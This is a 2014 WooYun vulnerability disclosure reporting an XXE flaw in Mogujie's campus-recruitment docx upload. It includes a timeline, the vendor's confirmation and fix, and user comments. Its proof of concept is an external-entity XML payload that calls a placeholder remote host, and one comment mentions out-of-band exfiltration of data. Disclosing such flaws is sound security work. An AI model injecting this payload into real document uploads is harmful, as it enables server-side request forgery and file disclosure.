当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078509

漏洞标题:蘑菇街存在XXE漏洞

相关厂商:蘑菇街

漏洞作者: 基佬库克

提交时间:2014-10-07 08:39

修复时间:2014-11-21 08:40

公开时间:2014-11-21 08:40

漏洞类型:设计缺陷/逻辑错误

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-07: 细节已通知厂商并且等待厂商处理中
2014-10-08: 厂商已经确认,细节仅向厂商公开
2014-10-18: 细节向核心白帽子及相关领域专家公开
2014-10-28: 细节向普通白帽子公开
2014-11-07: 细节向实习白帽子公开
2014-11-21: 细节向公众公开

简要描述:

虽然漏洞存在,但情景比较特殊,利用很有限,应提早引起重视,已防将来业务改变引起更大问题

详细说明:

二哥的典型例子:
http://wooyun.org/bugs/wooyun-2010-058381
这边也有:
http://wooyun.org/bugs/wooyun-2014-073439
介绍可以看这里:
http://wooyun.org/bugs/wooyun-2010-058381
出问题的点在校招平台上传docx文件,docx是典型的xml文件(压缩过的)
对实体做解析就会允许远程访问网站,本地文件访问,DOS攻击
在这个场景下利用比较有限吧,因为返回的数据有限。
对docx解析后,只提取其中 电话 邮箱 学校等信息,信息过长的话又会被忽略返回数据。
所有普通看一些文件是行不通的,可利用的话就访问网站和dos攻击了。

漏洞证明:

以下证明其可以进行网站的访问:
首先在自己的网站部署一个页面:内有少量数据
如:http://xxxx/xxe.htm
构造如下的xml实体:
<!DOCTYPE ANY [
<!ENTITY xee SYSTEM "http://xxxxx/xxe.htm">
]>
<w:t>&xee;@qq.com</w:t>
将这份docx提交,最终被解析成对用数据

修复方案:

换用安全的解析库
顺便问下,你们校招人数是不是很少,10个都不招1个?

版权声明:转载请注明来源 基佬库克@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-10-08 10:25

厂商回复:

感谢@基佬库克,该漏洞已修复!

最新状态:

暂无


漏洞评价:

评论

  1. 2014-10-07 10:01 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 | 总有一天,我会骑着雨牛@'雨。踩着一哥@jan...)

    蘑菇街还有xml?

  2. 2014-10-07 12:30 | 基佬库克 ( 实习白帽子 | Rank:75 漏洞数:15 | 简介什么的是直接爆菊吧..)

    @老和尚 看来你业务还没走透。。很不起眼的一个点,但是好多网站都有类似的店

  3. 2014-10-07 13:49 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 | 总有一天,我会骑着雨牛@'雨。踩着一哥@jan...)

    @基佬库克 蘑菇街是尼姑们逛的,俺乃一介法僧

  4. 2014-10-08 11:05 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @基佬库克 这个是很不错

  5. 2014-10-08 11:21 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @基佬库克 强烈推荐收藏

  6. 2014-10-08 11:56 | 基佬库克 ( 实习白帽子 | Rank:75 漏洞数:15 | 简介什么的是直接爆菊吧..)

    @xsser 神马意思 @蘑菇街 能回答下我的提问吗?

  7. 2014-10-08 14:28 | 黑色的屌丝 ( 路人 | Rank:27 漏洞数:5 | →_→→_→)

    这个已经修复,并且不会影响其它,能提交公开这个吗?

  8. 2014-10-08 16:48 | 基佬库克 ( 实习白帽子 | Rank:75 漏洞数:15 | 简介什么的是直接爆菊吧..)

    http://security.tencent.com/index.php/blog/msg/69这篇介绍了利用php过滤器编码后发到远程,即使不回显也over,不过蘑菇街好像java的。

  9. 2014-10-08 22:12 | 基佬库克 ( 实习白帽子 | Rank:75 漏洞数:15 | 简介什么的是直接爆菊吧..)

    @黑色的屌丝 它还没修复呢。

  10. 2015-03-26 09:22 | 干脆面 ( 路人 | Rank:5 漏洞数:2 | 慢慢学)

    @基佬库克 :)请问一下,这个 docx 是怎么构造的呢?